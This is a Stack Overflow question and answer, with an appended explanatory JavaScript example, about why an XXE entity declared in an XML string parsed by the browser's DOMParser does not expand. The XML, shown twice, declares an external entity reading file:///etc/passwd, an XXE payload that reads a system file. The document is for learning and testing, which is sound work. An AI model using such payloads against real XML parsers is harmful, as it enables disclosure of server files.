Question
Follow-up to this: Basic Working Example of an XXE Attack in HTML
It seemed easier to make this follow-up than to try to shoehorn my progress into the previous question. I thought it better to let the correct answer to that query stand as correct, plain and simple.
I have now evolved my example to the following:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<p id="xmlOut"></p>
<script type="application/javascript">
// The XML under test, written inline as a string. The internal DTD subset
// declares one internal entity (bar) and one external entity (xxe).
var xml = `
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY bar "test that entity substitution works in general">
]>
<foo>
display some text | &bar; | &xxe;
</foo>
`;
// Parse the string as XML (not HTML) so the DTD is honoured.
const parser = new DOMParser();
const xmlDoc = parser.parseFromString(xml, "text/xml");
// Show the first text node of <foo>. textContent is used rather than
// innerHTML so the parsed text is never re-interpreted as markup.
document.getElementById("xmlOut").textContent =
    xmlDoc.getElementsByTagName("foo")[0].childNodes[0].nodeValue;
</script>
</body>
</html>
Here, I'm writing in the XML as a string and parsing it with DOMParser. Everything works as expected, except that the xxe entity is not populated by anything. It does seem possible, as the answerer to the last question stated, that Firefox blocks external entity ... stuff. I also tried substituting in a text file in my home directory and that didn't work either. I also tried giving the path without the file:// prefix. Nothing has worked so far.
I can confirm that the DTD is being parsed and used though, so that's a big step forward.
Any tips appreciated~!
Answer 1:
It seems like most browsers do not load external DTDs, making this type of XXE attack pretty hard to test: Proper use of External DTD for XML
If anyone has any other insight though, feel free to leave an answer or comment!
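An added example, not code from the question or the answer above: a toy model of the entity expansion step that explains the behaviour the question observes (internal `&bar;` expands, external `&xxe;` comes back empty). It is not a real XML parser; it only handles the two declaration shapes used in the post, `<!ENTITY name "value">` and `<!ENTITY name SYSTEM "uri">`, and it never reads the filesystem. The difference between a browser (no external entity loading) and an XXE-vulnerable parser is modelled by an optional resolver callback, which is an assumption of this example, as is the fake "passwd" content fed to it. The sample XML and the `probeWithDOMParser` helper (which mirrors the question's test but reports a parser error instead of writing into the page) are constructed for this example.

```javascript
// Added example: toy model of DTD entity expansion, not the original post's code.
// Assumptions: only internal-subset declarations of the two shapes below are
// handled; "resolver" stands in for a parser's external-entity loader.

// Parse the internal DTD subset and return { internal: {...}, external: {...} }.
function parseEntityDeclarations(xml) {
  const internal = {};
  const external = {};
  const dtd = xml.match(/<!DOCTYPE[^\[]*\[([\s\S]*?)\]\s*>/);
  if (!dtd) return { internal, external };
  // <!ENTITY name SYSTEM "uri">  -> external entity (group 2)
  // <!ENTITY name "literal">     -> internal entity (group 3)
  const decl = /<!ENTITY\s+(\w+)\s+(?:SYSTEM\s+"([^"]*)"|"([^"]*)")\s*>/g;
  let m;
  while ((m = decl.exec(dtd[1])) !== null) {
    const [, name, systemId, literal] = m;
    if (systemId !== undefined) external[name] = systemId;
    else internal[name] = literal;
  }
  return { internal, external };
}

// Expand &name; references in the document body.
// resolver === null models a browser-like parser: external entities are not
// loaded, so the reference expands to "" and is reported in `unresolved`.
// resolver = function(uri) -> string models a parser with external entity
// loading enabled, i.e. the XXE-vulnerable configuration.
function expandEntities(xml, resolver = null) {
  const { internal, external } = parseEntityDeclarations(xml);
  const body = xml.replace(/<!DOCTYPE[\s\S]*?\]\s*>/, "");
  const unresolved = [];
  const text = body.replace(/&(\w+);/g, (ref, name) => {
    if (name in internal) return internal[name];
    if (name in external) {
      if (resolver) return resolver(external[name]);
      unresolved.push(name);
      return "";
    }
    return ref; // unknown reference: leave it untouched
  });
  return { text, unresolved };
}

// Browser-only helper mirroring the question's test. Returns null outside a
// browser (no DOMParser), so this file also loads under Node.
function probeWithDOMParser(xml) {
  if (typeof DOMParser === "undefined") return null;
  const doc = new DOMParser().parseFromString(xml, "text/xml");
  const err = doc.getElementsByTagName("parsererror")[0];
  if (err) return { error: err.textContent };
  return { text: doc.getElementsByTagName("foo")[0].textContent };
}

// Constructed sample with the same shape as the question's payload.
const SAMPLE_XML = `<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY bar "test that entity substitution works in general">
]>
<foo>display some text | &bar; | &xxe;</foo>`;

// Constructed stand-in for a file system; no real file is read.
const FAKE_FILES = { "file:///etc/passwd": "root:x:0:0:root:/root:/bin/bash" };

// Browser-like behaviour: &bar; expands, &xxe; is empty and reported.
const safeResult = expandEntities(SAMPLE_XML);
// Vulnerable parser: the external entity is fetched through the resolver.
const vulnerableResult = expandEntities(SAMPLE_XML, (uri) => FAKE_FILES[uri] || "");

console.log("browser-like:", safeResult);
console.log("external loading on:", vulnerableResult);
console.log("DOMParser probe:", probeWithDOMParser(SAMPLE_XML));
```

Run it in a browser console to see `probeWithDOMParser` report the same empty `&xxe;` as the question, and under Node to see the two modelled outcomes side by side; the point is that the payload is correct and the missing content is the parser refusing to load the SYSTEM entity, which is the behaviour the answer describes.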
Source: https://stackoverflow.com/questions/59937037/basic-working-example-of-an-xxe-attack-in-html-part-2